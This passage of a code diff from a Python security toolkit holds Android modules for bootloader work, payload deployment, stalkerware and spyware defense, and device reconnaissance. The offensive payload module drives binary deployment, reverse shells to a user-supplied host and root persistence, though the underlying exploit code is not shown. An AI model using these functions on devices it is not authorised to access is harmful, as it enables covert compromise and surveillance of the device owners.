print(f" Flash started (op: {result.get('op_id', '?')})")
else:
print(f" Error: {result.get('error', 'Failed')}")
def disable_verity(self):
if not self._ensure_device():
return
try:
vbmeta = input(" vbmeta image path (optional, Enter to skip): ").strip() or None
except (EOFError, KeyboardInterrupt):
return
print(" Disabling dm-verity/AVB...")
result = self.mgr.disable_verity(self.serial, vbmeta)
print(f" Result: {result.get('output', 'Done')}")
print(f" Method: {result.get('method', '?')}")
def temp_boot(self):
if not self._ensure_device():
return
try:
img = input(" Boot image path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not img:
return
print(" Temp-booting image (no permanent flash)...")
result = self.mgr.boot_temp(self.serial, img)
if result['success']:
print(" Device booting from temporary image.")
else:
print(f" Error: {result.get('output', 'Failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.bootloader_info,
'2': self.backup_boot,
'3': self.unlock_bootloader,
'4': self.flash_recovery,
'5': self.flash_boot,
'6': self.disable_verity,
'7': self.temp_boot,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidBoot()
m.run_interactive()

191
modules/android_payload.py Normal file
View File

@@ -0,0 +1,191 @@
"""
Android Payload Deployment - Deploy binaries, reverse shells, persistence
"""
DESCRIPTION = "Android payload deployment (binaries, reverse shells, persistence)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidPayload:
"""Interactive menu for Android payload deployment."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Payload Deployment")
print(f"{'='*50}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Deploy Binary")
print(" [2] Execute Payload")
print(" [3] Setup Reverse Shell")
print(" [4] Install Persistence [ROOT]")
print(" [5] List Running Payloads")
print(" [6] Kill Payload")
print(" [s] Select Device")
print(" [0] Back")
print()
def deploy_binary(self):
if not self._ensure_device():
return
try:
local = input(" Local binary path: ").strip()
remote = input(" Remote path [/data/local/tmp/]: ").strip() or '/data/local/tmp/'
except (EOFError, KeyboardInterrupt):
return
if not local:
return
print(" Deploying...")
result = self.mgr.deploy_binary(self.serial, local, remote)
if result['success']:
print(f" Deployed to: {result['remote_path']}")
else:
print(f" Error: {result['error']}")
def execute_payload(self):
if not self._ensure_device():
return
try:
remote = input(" Remote path: ").strip()
args = input(" Arguments []: ").strip()
bg = input(" Background? [Y/n]: ").strip().lower() != 'n'
except (EOFError, KeyboardInterrupt):
return
if not remote:
return
print(" Executing...")
result = self.mgr.execute_payload(self.serial, remote, args=args, background=bg)
if result['success']:
if result['background']:
print(f" Running in background, PID: {result['pid']}")
else:
print(f" Output:\n{result['output']}")
else:
print(f" Error: {result.get('output', 'Failed')}")
def reverse_shell(self):
if not self._ensure_device():
return
try:
lhost = input(" LHOST (your IP): ").strip()
lport = input(" LPORT: ").strip()
print(" Methods: nc, bash, python")
method = input(" Method [nc]: ").strip() or 'nc'
except (EOFError, KeyboardInterrupt):
return
if not lhost or not lport:
return
print(f" Setting up {method} reverse shell to {lhost}:{lport}...")
result = self.mgr.setup_reverse_shell(self.serial, lhost, int(lport), method)
if result['success']:
print(f" Reverse shell initiated ({method})")
print(f" Catch with: nc -lvnp {lport}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def persistence(self):
if not self._ensure_device():
return
try:
method = input(" Method [init.d]: ").strip() or 'init.d'
except (EOFError, KeyboardInterrupt):
return
print(" Installing persistence (requires root)...")
result = self.mgr.install_persistence(self.serial, method)
if result['success']:
print(f" Installed at: {result['path']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def list_payloads(self):
if not self._ensure_device():
return
result = self.mgr.list_running_payloads(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
if not result['payloads']:
print(" No running payloads found in /data/local/tmp/")
return
print(f"\n Found {result['count']} running payloads:")
for p in result['payloads']:
print(f" PID {p['pid']}: {p['command']}")
def kill_payload(self):
if not self._ensure_device():
return
try:
pid = input(" PID to kill: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not pid:
return
result = self.mgr.kill_payload(self.serial, pid)
print(f" Kill signal sent to PID {pid}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.deploy_binary,
'2': self.execute_payload,
'3': self.reverse_shell,
'4': self.persistence,
'5': self.list_payloads,
'6': self.kill_payload,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidPayload()
m.run_interactive()

936
modules/android_protect.py Normal file
View File

@@ -0,0 +1,936 @@
"""
Android Protection Shield - Anti-stalkerware & anti-spyware defense
Detect, analyze, and remove stalkerware and government-grade spyware from Android devices.
"""
DESCRIPTION = "Android anti-stalkerware/spyware shield"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "defense"
class AndroidProtect:
"""Interactive Android protection menu."""
def __init__(self):
from core.android_protect import get_android_protect_manager
from core.hardware import get_hardware_manager
self.mgr = get_android_protect_manager()
self.hw = get_hardware_manager()
self.serial = None
def _pick_device(self):
"""Select an ADB device."""
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return None
if len(devices) == 1:
self.serial = devices[0]['serial']
return self.serial
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
return self.serial
except (ValueError, EOFError, KeyboardInterrupt):
pass
return None
def _ensure_device(self):
"""Ensure we have a selected device."""
if self.serial:
return self.serial
return self._pick_device()
def _print_severity(self, sev):
"""Color indicator for severity."""
markers = {
'critical': '[!!!]',
'high': '[!! ]',
'medium': '[! ]',
'low': '[ ]',
}
return markers.get(sev, '[? ]')
def show_menu(self):
status = self.hw.get_status()
serial_str = self.serial or 'None selected'
# Shizuku/Shield info
shizuku_str = 'N/A'
shield_str = 'N/A'
if self.serial:
try:
sz = self.mgr.check_shizuku(self.serial)
if sz['installed']:
shizuku_str = f"{'Running' if sz['running'] else 'Stopped'}"
if sz['version']:
shizuku_str += f" v{sz['version']}"
else:
shizuku_str = 'Not installed'
sh = self.mgr.check_shield_app(self.serial)
shield_str = f"v{sh['version']}" if sh['installed'] else 'Not installed'
except Exception:
pass
sig_stats = self.mgr.get_signature_stats()
print(f"\n{'='*60}")
print(" Android Protection Shield")
print(f"{'='*60}")
print(f" ADB: {'Available' if status['adb'] else 'Not found'}")
print(f" Device: {serial_str}")
print(f" Shizuku: {shizuku_str} | Shield: {shield_str}")
print(f" DB: {sig_stats['stalkerware_packages']} packages, "
f"{sig_stats['government_spyware']} govt spyware")
print()
print(" -- Quick Actions --")
print(" 1) Quick Scan (fast)")
print(" 2) Full Protection Scan")
print(" 3) Export Scan Report")
print()
print(" -- Detection --")
print(" 10) Scan Stalkerware")
print(" 11) Scan Hidden Apps")
print(" 12) Scan Device Admins")
print(" 13) Scan Accessibility Services")
print(" 14) Scan Notification Listeners")
print(" 15) Scan Spyware Indicators (Pegasus/Predator)")
print(" 16) Scan System Integrity")
print(" 17) Scan Suspicious Processes")
print(" 18) Scan Certificates (MITM)")
print(" 19) Scan Network Config")
print(" 20) Scan Developer Options")
print()
print(" -- Permission Analysis --")
print(" 30) Find Dangerous Apps")
print(" 31) Analyze App Permissions")
print(" 32) Permission Heatmap")
print()
print(" -- Remediation --")
print(" 40) Disable Threat")
print(" 41) Uninstall Threat")
print(" 42) Revoke Dangerous Permissions")
print(" 43) Remove Device Admin")
print(" 44) Remove Rogue CA Cert")
print(" 45) Clear Proxy Settings")
print()
print(" -- Shizuku & Shield --")
print(" 50) Shizuku Status")
print(" 51) Install Shizuku")
print(" 52) Start Shizuku Service")
print(" 53) Install Shield App")
print(" 54) Configure Shield")
print(" 55) Grant Shield Permissions")
print()
print(" -- Database --")
print(" 60) Signature Stats")
print(" 61) Update Signatures")
print()
print(" -- Tracking Honeypot --")
print(" 70) Honeypot Status")
print(" 71) Scan Tracker Apps")
print(" 72) Scan Tracker Permissions")
print(" 73) View Ad Tracking Settings")
print()
print(" 74) Reset Advertising ID")
print(" 75) Opt Out of Ad Tracking")
print(" 76) Set Ad-Blocking DNS")
print(" 77) Disable Location Scanning")
print()
print(" 78) Deploy Hosts Blocklist (root)")
print(" 79) Setup Traffic Redirect (root)")
print(" 80) Set Fake Location (root)")
print(" 81) Random Fake Location (root)")
print(" 82) Rotate Device Identity (root)")
print(" 83) Generate Fake Fingerprint (root)")
print()
print(" 84) Activate Honeypot (all tiers)")
print(" 85) Deactivate Honeypot")
print()
print(" 86) Tracker Domain Stats")
print(" 87) Update Tracker Domains")
print()
print(" [s] Select Device")
print(" 0) Back")
print()
# ── Quick Actions ───────────────────────────────────────────────
def do_quick_scan(self):
if not self._ensure_device():
return
print(f"\n Running quick scan on {self.serial}...")
result = self.mgr.quick_scan(self.serial)
summary = result.get('summary', {})
print(f"\n {'='*50}")
print(f" Quick Scan Results")
print(f" {'='*50}")
print(f" Threats found: {summary.get('threats_found', 0)}")
print(f" Stalkerware: {summary.get('stalkerware', 0)}")
print(f" Suspicious admins: {summary.get('suspicious_admins', 0)}")
print(f" Malicious accessibility: {summary.get('malicious_accessibility', 0)}")
found = result.get('stalkerware', {}).get('found', [])
if found:
print(f"\n Stalkerware Detected:")
for f in found:
print(f" {self._print_severity(f['severity'])} {f['name']} ({f['package']})")
print(f" {f['description']}")
def do_full_scan(self):
if not self._ensure_device():
return
print(f"\n Running full protection scan on {self.serial}...")
print(" This may take a few minutes...")
result = self.mgr.full_protection_scan(self.serial)
summary = result.get('summary', {})
print(f"\n {'='*50}")
print(f" Full Scan Results")
print(f" {'='*50}")
print(f" Total threats: {summary.get('threats_found', 0)}")
print(f" System integrity: {summary.get('system_integrity', 'N/A')}")
print(f" Hidden apps: {summary.get('hidden_apps', 0)}")
print(f" Dangerous apps: {summary.get('dangerous_apps', 0)}")
print(f" User CA certs: {summary.get('user_ca_certs', 0)}")
found = result.get('stalkerware', {}).get('found', [])
if found:
print(f"\n Stalkerware:")
for f in found:
print(f" {self._print_severity(f['severity'])} {f['name']} ({f['package']})")
spyware = result.get('spyware_indicators', {}).get('findings', [])
if spyware:
print(f"\n Government Spyware Indicators:")
for s in spyware:
print(f" {self._print_severity(s['severity'])} {s['name']}")
for ind in s.get('indicators_matched', []):
print(f" {ind['type']}: {ind['value']}")
def do_export_report(self):
if not self._ensure_device():
return
print(f"\n Running full scan and exporting...")
scan = self.mgr.full_protection_scan(self.serial)
result = self.mgr.export_scan_report(self.serial, scan)
if result.get('ok'):
print(f" Report saved: {result['path']}")
else:
print(f" Error: {result.get('error', 'Unknown')}")
# ── Detection ───────────────────────────────────────────────────
def do_scan_stalkerware(self):
if not self._ensure_device():
return
print(f"\n Scanning for stalkerware...")
result = self.mgr.scan_stalkerware(self.serial)
if result.get('error'):
print(f" Error: {result['error']}")
return
print(f" Scanned {result['total']} packages, {result['clean_count']} clean")
found = result.get('found', [])
if found:
print(f"\n Found {len(found)} threats:")
for f in found:
print(f" {self._print_severity(f['severity'])} {f['name']}")
print(f" Package: {f['package']}")
print(f" {f['description']}")
else:
print(" No stalkerware detected.")
def do_scan_hidden(self):
if not self._ensure_device():
return
print(f"\n Scanning for hidden apps...")
result = self.mgr.scan_hidden_apps(self.serial)
apps = result.get('hidden_apps', [])
print(f" Found {len(apps)} hidden apps (no launcher icon):")
for app in apps:
print(f" - {app}")
def do_scan_admins(self):
if not self._ensure_device():
return
print(f"\n Scanning device admins...")
result = self.mgr.scan_device_admins(self.serial)
admins = result.get('admins', [])
print(f" Found {len(admins)} device admins:")
for a in admins:
marker = " [SUSPICIOUS]" if a.get('suspicious') else ""
print(f" - {a['package']}{marker}")
def do_scan_accessibility(self):
if not self._ensure_device():
return
print(f"\n Scanning accessibility services...")
result = self.mgr.scan_accessibility_services(self.serial)
services = result.get('services', [])
if not services:
print(" No accessibility services enabled.")
return
for s in services:
status = s.get('status', 'unknown')
marker = {'legitimate': '[OK]', 'malicious': '[BAD]', 'unknown': '[??]'}
print(f" {marker.get(status, '[??]')} {s['package']}")
def do_scan_listeners(self):
if not self._ensure_device():
return
print(f"\n Scanning notification listeners...")
result = self.mgr.scan_notification_listeners(self.serial)
listeners = result.get('listeners', [])
if not listeners:
print(" No notification listeners enabled.")
return
for l in listeners:
marker = " [SUSPICIOUS]" if l.get('suspicious') else ""
print(f" - {l['package']}{marker}")
def do_scan_spyware(self):
if not self._ensure_device():
return
print(f"\n Scanning for government spyware indicators...")
print(" Checking Pegasus, Predator, Hermit, FinSpy, etc...")
result = self.mgr.scan_spyware_indicators(self.serial)
print(f" Checked {result.get('spyware_checked', 0)} spyware families")
findings = result.get('findings', [])
if findings:
print(f"\n ALERT: Found {len(findings)} indicators:")
for f in findings:
print(f" {self._print_severity(f['severity'])} {f['name']}")
print(f" {f.get('description', '')}")
for ind in f.get('indicators_matched', []):
print(f" {ind['type']}: {ind['value']}")
else:
print(" No government spyware indicators found.")
def do_scan_integrity(self):
if not self._ensure_device():
return
print(f"\n Checking system integrity...")
result = self.mgr.scan_system_integrity(self.serial)
print(f" Passed: {result['ok_count']}/{result['total']}")
for name, check in result.get('checks', {}).items():
status = "[OK]" if check['ok'] else "[!!]"
print(f" {status} {check['description']}: {check['value']}")
def do_scan_processes(self):
if not self._ensure_device():
return
print(f"\n Scanning for suspicious processes...")
result = self.mgr.scan_suspicious_processes(self.serial)
findings = result.get('findings', [])
if findings:
print(f" Found {len(findings)} suspicious items:")
for f in findings:
print(f" [{f['severity'].upper()}] {f['type']}: {f['detail']}")
else:
print(" No suspicious processes found.")
def do_scan_certs(self):
if not self._ensure_device():
return
print(f"\n Scanning certificates...")
result = self.mgr.scan_certificates(self.serial)
certs = result.get('certs', [])
if certs:
print(f" Found {len(certs)} user-installed CA certs:")
for c in certs:
print(f" - {c['hash']}: {c['detail']}")
else:
print(" No user-installed CA certificates.")
def do_scan_network(self):
if not self._ensure_device():
return
print(f"\n Scanning network configuration...")
result = self.mgr.scan_network_config(self.serial)
for name, check in result.get('checks', {}).items():
status = "[OK]" if check.get('ok', True) else "[!!]"
desc = check.get('description', name)
print(f" {status} {desc}: {check['value']}")
def do_scan_devopt(self):
if not self._ensure_device():
return
print(f"\n Scanning developer options...")
result = self.mgr.scan_developer_options(self.serial)
for name, check in result.get('checks', {}).items():
marker = "[ON] " if check.get('enabled') else "[OFF]"
print(f" {marker} {check['description']}: {check['value']}")
# ── Permission Analysis ─────────────────────────────────────────
def do_dangerous_apps(self):
if not self._ensure_device():
return
print(f"\n Finding apps with dangerous permission combos...")
print(" This may take a while...")
result = self.mgr.find_dangerous_apps(self.serial)
dangerous = result.get('dangerous', [])
if dangerous:
print(f"\n Found {len(dangerous)} dangerous apps:")
for d in dangerous:
print(f" {self._print_severity(d['severity'])} {d['package']}")
print(f" Pattern: {d['combo']}")
print(f" Perms: {', '.join(d['matched_perms'])}")
else:
print(" No apps with dangerous permission combos found.")
def do_analyze_perms(self):
if not self._ensure_device():
return
try:
package = input(" Package name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not package:
return
result = self.mgr.analyze_app_permissions(self.serial, package)
if result.get('error'):
print(f" Error: {result['error']}")
return
perms = result.get('permissions', {})
info = result.get('info', {})
print(f"\n {package}")
if info:
for k, v in info.items():
print(f" {k}: {v}")
print(f"\n Granted ({len(perms.get('granted', []))}):")
for p in perms.get('granted', []):
print(f" + {p}")
print(f" Denied ({len(perms.get('denied', []))}):")
for p in perms.get('denied', []):
print(f" - {p}")
def do_perm_heatmap(self):
if not self._ensure_device():
return
print(f"\n Building permission heatmap...")
print(" This scans all non-system apps, may take a while...")
result = self.mgr.permission_heatmap(self.serial)
matrix = result.get('matrix', [])
perm_names = result.get('permission_names', [])
if not matrix:
print(" No apps with dangerous permissions found.")
return
# Print header
short = [p[:8] for p in perm_names]
header = f" {'Package':<35} " + " ".join(f"{s:<8}" for s in short)
print(f"\n{header}")
print(f" {'-'*len(header)}")
for row in matrix[:30]: # Limit display
pkg = row['package'][:34]
perms = row['permissions']
cells = " ".join(
f"{' X ' if perms.get(p) else ' . '}"
for p in perm_names
)
print(f" {pkg:<35} {cells}")
if len(matrix) > 30:
print(f" ... and {len(matrix) - 30} more apps")
# ── Remediation ─────────────────────────────────────────────────
def _get_package_input(self, prompt=" Package to target: "):
try:
return input(prompt).strip()
except (EOFError, KeyboardInterrupt):
return ''
def do_disable(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
result = self.mgr.disable_threat(self.serial, pkg)
if result.get('ok'):
print(f" Disabled: {pkg}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_uninstall(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
try:
confirm = input(f" Uninstall {pkg}? (y/N): ").strip().lower()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'y':
print(" Cancelled.")
return
result = self.mgr.uninstall_threat(self.serial, pkg)
if result.get('ok'):
print(f" Uninstalled: {pkg}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_revoke(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
result = self.mgr.revoke_dangerous_perms(self.serial, pkg)
print(f" Revoked: {', '.join(result['revoked'])}")
if result['failed']:
print(f" Failed: {', '.join(result['failed'])}")
def do_remove_admin(self):
if not self._ensure_device():
return
pkg = self._get_package_input()
if not pkg:
return
result = self.mgr.remove_device_admin(self.serial, pkg)
if result.get('ok'):
print(f" Removed device admin: {result.get('message', pkg)}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_remove_cert(self):
if not self._ensure_device():
return
# List certs first
certs = self.mgr.scan_certificates(self.serial).get('certs', [])
if not certs:
print(" No user CA certs to remove.")
return
print(" User CA certificates:")
for i, c in enumerate(certs, 1):
print(f" {i}) {c['hash']}: {c['detail']}")
try:
choice = int(input(" Remove #: ").strip())
if 1 <= choice <= len(certs):
result = self.mgr.remove_ca_cert(self.serial, certs[choice - 1]['hash'])
if result.get('ok'):
print(f" Removed.")
else:
print(f" Error: {result.get('error')}")
except (ValueError, EOFError, KeyboardInterrupt):
pass
def do_clear_proxy(self):
if not self._ensure_device():
return
result = self.mgr.clear_proxy(self.serial)
for r in result.get('results', []):
status = "OK" if r['ok'] else "FAIL"
print(f" [{status}] {r['setting']}")
# ── Shizuku & Shield ────────────────────────────────────────────
def do_shizuku_status(self):
if not self._ensure_device():
return
result = self.mgr.shizuku_status(self.serial)
print(f"\n Shizuku Status:")
print(f" Installed: {result['installed']}")
print(f" Running: {result.get('running', False)}")
print(f" Version: {result.get('version', 'N/A')}")
def do_install_shizuku(self):
if not self._ensure_device():
return
try:
apk = input(" Shizuku APK path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not apk:
return
result = self.mgr.install_shizuku(self.serial, apk)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error')}")
def do_start_shizuku(self):
if not self._ensure_device():
return
result = self.mgr.start_shizuku(self.serial)
if result.get('ok'):
print(f" Shizuku started: {result.get('output', '')}")
else:
print(f" Error: {result.get('error')}")
def do_install_shield(self):
if not self._ensure_device():
return
try:
apk = input(" Shield APK path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not apk:
return
result = self.mgr.install_shield_app(self.serial, apk)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error')}")
def do_configure_shield(self):
if not self._ensure_device():
return
print(" Shield Configuration (JSON):")
try:
config_str = input(" > ").strip()
config = json.loads(config_str)
except (EOFError, KeyboardInterrupt):
return
except json.JSONDecodeError:
print(" Invalid JSON.")
return
result = self.mgr.configure_shield(self.serial, config)
if result.get('ok'):
print(f" Config sent: {result.get('output', '')}")
else:
print(f" Error: {result.get('output', 'Failed')}")
def do_grant_shield_perms(self):
if not self._ensure_device():
return
result = self.mgr.grant_shield_permissions(self.serial)
for p in result.get('granted', []):
print(f" [OK] {p}")
for f in result.get('failed', []):
print(f" [!!] {f['perm']}: {f['error']}")
# ── Tracking Honeypot ─────────────────────────────────────────
def do_honeypot_status(self):
if not self._ensure_device():
return
print(f"\n Checking honeypot status...")
result = self.mgr.honeypot_status(self.serial)
print(f"\n Honeypot Status:")
print(f" Active: {result.get('active', False)}")
print(f" Tier: {result.get('tier', 0)}")
print(f" Ad tracking: {'limited' if result.get('ad_tracking_limited') else 'not limited'}")
print(f" Private DNS: {result.get('private_dns_mode', 'off')}")
if result.get('private_dns_host'):
print(f" DNS host: {result['private_dns_host']}")
protections = result.get('protections', {})
if protections:
print(f" Protections:")
for k, v in protections.items():
print(f" {k}: {v}")
def do_scan_tracker_apps(self):
if not self._ensure_device():
return
print(f"\n Scanning for tracker apps...")
result = self.mgr.scan_tracker_apps(self.serial)
if result.get('error'):
print(f" Error: {result['error']}")
return
found = result.get('found', [])
print(f" Found {len(found)} tracker packages out of {result.get('total', 0)} installed:")
for pkg in found:
print(f" - {pkg}")
if not found:
print(" No known tracker apps found.")
def do_scan_tracker_perms(self):
if not self._ensure_device():
return
print(f"\n Scanning for tracking permissions...")
result = self.mgr.scan_tracker_permissions(self.serial)
apps = result.get('apps', [])
if apps:
print(f" {len(apps)} apps have tracking permissions:")
for app in apps[:30]:
print(f" {app['package']}: {', '.join(app['permissions'])}")
if len(apps) > 30:
print(f" ... and {len(apps) - 30} more")
else:
print(" No apps with tracking permissions found.")
def do_ad_settings(self):
if not self._ensure_device():
return
print(f"\n Ad Tracking Settings:")
result = self.mgr.get_tracking_settings(self.serial)
for name, info in result.items():
print(f" {info.get('description', name)}: {info['value']}")
def do_reset_ad_id(self):
if not self._ensure_device():
return
result = self.mgr.reset_advertising_id(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_opt_out_tracking(self):
if not self._ensure_device():
return
result = self.mgr.opt_out_ad_tracking(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_set_dns(self):
if not self._ensure_device():
return
print(" Available DNS providers:")
db = self.mgr._load_tracker_domains()
providers = db.get('dns_providers', {})
for name, info in providers.items():
print(f" {name}: {info.get('description', info.get('hostname', ''))}")
try:
provider = input(" Provider name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not provider:
return
result = self.mgr.set_private_dns(self.serial, provider)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_disable_location(self):
if not self._ensure_device():
return
result = self.mgr.disable_location_accuracy(self.serial)
if result.get('ok'):
print(" WiFi and Bluetooth scanning disabled.")
else:
print(" Some settings failed:")
for r in result.get('results', []):
status = "OK" if r['ok'] else "FAIL"
print(f" [{status}] {r['setting']}")
def do_deploy_hosts(self):
if not self._ensure_device():
return
print(" Deploying hosts blocklist (requires root)...")
result = self.mgr.deploy_hosts_blocklist(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_setup_iptables(self):
if not self._ensure_device():
return
try:
port_str = input(" Redirect port [9040]: ").strip()
except (EOFError, KeyboardInterrupt):
return
port = int(port_str) if port_str else 9040
result = self.mgr.setup_iptables_redirect(self.serial, port)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_set_fake_location(self):
if not self._ensure_device():
return
try:
lat = float(input(" Latitude: ").strip())
lon = float(input(" Longitude: ").strip())
except (ValueError, EOFError, KeyboardInterrupt):
print(" Invalid coordinates.")
return
result = self.mgr.set_fake_location(self.serial, lat, lon)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_random_location(self):
if not self._ensure_device():
return
result = self.mgr.set_random_fake_location(self.serial)
if result.get('ok'):
print(f" {result['message']}")
if result.get('location_name'):
print(f" Location: {result['location_name']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_rotate_identity(self):
if not self._ensure_device():
return
result = self.mgr.rotate_device_identity(self.serial)
if result.get('ok'):
print(f" {result['message']}")
for c in result.get('changes', []):
status = "OK" if c['ok'] else "FAIL"
print(f" [{status}] {c['setting']}: {c['value']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_fake_fingerprint(self):
if not self._ensure_device():
return
result = self.mgr.generate_fake_fingerprint(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_activate_honeypot(self):
if not self._ensure_device():
return
print(" Select protection tier:")
print(" 1) ADB only (no root)")
print(" 2) ADB + Shizuku")
print(" 3) Full (ADB + Shizuku + Root)")
try:
tier = int(input(" Tier [1]: ").strip() or '1')
except (ValueError, EOFError, KeyboardInterrupt):
return
if tier not in (1, 2, 3):
print(" Invalid tier.")
return
print(f"\n Activating Tier {tier} honeypot...")
result = self.mgr.honeypot_activate(self.serial, tier)
print(f" {result.get('summary', 'Done')}")
for action in result.get('actions', []):
r = action['result']
status = "OK" if r.get('ok', False) else "FAIL"
msg = r.get('message', r.get('error', ''))
print(f" [{status}] {action['name']}: {msg}")
def do_deactivate_honeypot(self):
if not self._ensure_device():
return
print(" Deactivating honeypot...")
result = self.mgr.honeypot_deactivate(self.serial)
for action in result.get('actions', []):
r = action['result']
status = "OK" if r.get('ok', False) else "FAIL"
print(f" [{status}] {action['name']}")
print(" Honeypot deactivated.")
def do_tracker_stats(self):
stats = self.mgr.get_tracker_stats()
print(f"\n Tracker Domain Database:")
print(f" Version: {stats['version']}")
print(f" Total domains: {stats['total_domains']}")
print(f" Companies: {stats['companies']}")
print(f" Tracker pkgs: {stats['packages']}")
print(f" DNS providers: {', '.join(stats.get('dns_providers', []))}")
print(f" Categories:")
for cat, count in stats.get('categories', {}).items():
print(f" {cat}: {count} domains")
def do_update_trackers(self):
print(" Updating tracker domains...")
result = self.mgr.update_tracker_domains()
if result.get('ok'):
print(f" Updated: merged {result['merged']} new domains")
else:
print(f" Error: {result.get('error')}")
# ── Database ────────────────────────────────────────────────────
def do_sig_stats(self):
stats = self.mgr.get_signature_stats()
print(f"\n Signature Database Stats:")
print(f" Version: {stats['version']}")
print(f" Last updated: {stats['last_updated']}")
print(f" Stalkerware families: {stats['stalkerware_families']}")
print(f" Stalkerware packages: {stats['stalkerware_packages']}")
print(f" Government spyware: {stats['government_spyware']}")
print(f" Permission combos: {stats['permission_combos']}")
def do_update_sigs(self):
print(" Updating signatures from GitHub...")
result = self.mgr.update_signatures()
if result.get('ok'):
print(f" Updated: merged {result['merged']} new packages")
else:
print(f" Error: {result.get('error')}")
# ── Main Loop ───────────────────────────────────────────────────
def run_interactive(self):
import json
while True:
self.show_menu()
try:
choice = input(" Select > ").strip()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.do_quick_scan,
'2': self.do_full_scan,
'3': self.do_export_report,
'10': self.do_scan_stalkerware,
'11': self.do_scan_hidden,
'12': self.do_scan_admins,
'13': self.do_scan_accessibility,
'14': self.do_scan_listeners,
'15': self.do_scan_spyware,
'16': self.do_scan_integrity,
'17': self.do_scan_processes,
'18': self.do_scan_certs,
'19': self.do_scan_network,
'20': self.do_scan_devopt,
'30': self.do_dangerous_apps,
'31': self.do_analyze_perms,
'32': self.do_perm_heatmap,
'40': self.do_disable,
'41': self.do_uninstall,
'42': self.do_revoke,
'43': self.do_remove_admin,
'44': self.do_remove_cert,
'45': self.do_clear_proxy,
'50': self.do_shizuku_status,
'51': self.do_install_shizuku,
'52': self.do_start_shizuku,
'53': self.do_install_shield,
'54': self.do_configure_shield,
'55': self.do_grant_shield_perms,
'60': self.do_sig_stats,
'61': self.do_update_sigs,
'70': self.do_honeypot_status,
'71': self.do_scan_tracker_apps,
'72': self.do_scan_tracker_perms,
'73': self.do_ad_settings,
'74': self.do_reset_ad_id,
'75': self.do_opt_out_tracking,
'76': self.do_set_dns,
'77': self.do_disable_location,
'78': self.do_deploy_hosts,
'79': self.do_setup_iptables,
'80': self.do_set_fake_location,
'81': self.do_random_location,
'82': self.do_rotate_identity,
'83': self.do_fake_fingerprint,
'84': self.do_activate_honeypot,
'85': self.do_deactivate_honeypot,
'86': self.do_tracker_stats,
'87': self.do_update_trackers,
's': self._pick_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
ap = AndroidProtect()
ap.run_interactive()

221
modules/android_recon.py Normal file
View File

@@ -0,0 +1,221 @@
"""
Android Device Reconnaissance - Extract device data, accounts, messages, history
"""
DESCRIPTION = "Android device reconnaissance (data extraction, accounts, logs)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidRecon:
